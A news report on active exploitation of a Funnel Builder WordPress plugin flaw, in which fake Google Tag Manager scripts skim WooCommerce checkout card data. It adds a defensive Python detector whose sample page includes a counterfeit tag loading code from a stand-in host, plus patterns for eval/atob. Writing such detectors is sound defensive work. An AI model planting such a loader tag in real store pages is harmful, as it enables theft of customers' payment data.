Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming

  • General

A serious security flaw in the WordPress Funnel Builder plugin is being actively exploited in the wild. Attackers are injecting malicious JavaScript into WooCommerce checkout pages to steal customers' payment information. Sansec published details of the campaign this week. The vulnerability does not yet have an official CVE ID assigned. It affects all plugin versions prior to 3.15.0.3; the plugin is used by over 40,000 WooCommerce stores. According to the Dutch e-commerce security firm, the vulnerability enables unauthenticated attackers to insert arbitrary JavaScript code onto every checkout page of the affected store. FunnelKit, the company behind Funnel Builder, has issued a security patch for the vulnerability in version 3.15.0.3. "Attackers are injecting counterfeit Google Tag Manager scripts via the plugin's 'External Scripts' configuration," it noted. The injected script blends in with the store's legitimate analytics tags, but secretly loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses during checkout. According to Sansec, Funnel Builder exposes a checkout endpoint that lets any incoming request select which internal method to execute.
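Because the injected tag is designed to blend in with genuine Google Tag Manager snippets, a store owner checking a checkout page by eye can easily miss it. The following script is an added example (not code from Sansec, FunnelKit or The Hacker News) that parses the HTML of a checkout page and flags any script, external or inline, that loads code from a host outside a per-store allowlist or that decodes/evaluates code at runtime; the store domain `shop.example`, the host `gtm-cdn.example.net` and the sample page are constructed for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a checkout page on this store may legitimately load scripts from.
# shop.example stands in for the store's own domain; the other two are Google's real hosts.
TRUSTED_HOSTS = {"shop.example", "www.googletagmanager.com", "www.google-analytics.com"}


class ScriptCollector(HTMLParser):
    """Collect every <script> tag on the page: its src attribute and its inline body."""
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1]["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def hosts_in(text):
    """Every hostname referenced by an absolute URL inside a script src or body."""
    return {h for h in (urlparse(u).hostname for u in re.findall(r"https?://[^\s'\"<>]+", text)) if h}


def suspicious_scripts(html):
    """Return one reason string per script that does not look like a genuine analytics tag."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for s in p.scripts:
        untrusted = hosts_in(s["src"] or s["body"]) - TRUSTED_HOSTS
        if untrusted:  # a "GTM" snippet that fetches its loader from somewhere else
            findings.append("script loads code from untrusted host(s): " + ", ".join(sorted(untrusted)))
        elif not s["src"] and re.search(r"\b(atob|eval|unescape)\(", s["body"]):
            findings.append("inline script decodes or evaluates code at runtime")
    return findings


# Constructed sample checkout page: a real-looking GTM snippet, a WooCommerce script from the
# store itself, and a counterfeit tag that mimics GTM but pulls its loader from another host.
SAMPLE_CHECKOUT = """
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXX');</script>
<script src="https://shop.example/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script>var g=document.createElement('script');g.src='https://gtm-cdn.example.net/gtm.js?id=GTM-XXXX';
document.head.appendChild(g);</script>
"""

if __name__ == "__main__":
    for reason in suspicious_scripts(SAMPLE_CHECKOUT):
        print(reason)
```

Run it against the saved HTML of your own checkout page (after adding your store's domain and any tag hosts you actually use to `TRUSTED_HOSTS`); any flagged script deserves a look at the plugin's External Scripts setting and at the page source served to customers.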

  The Hacker News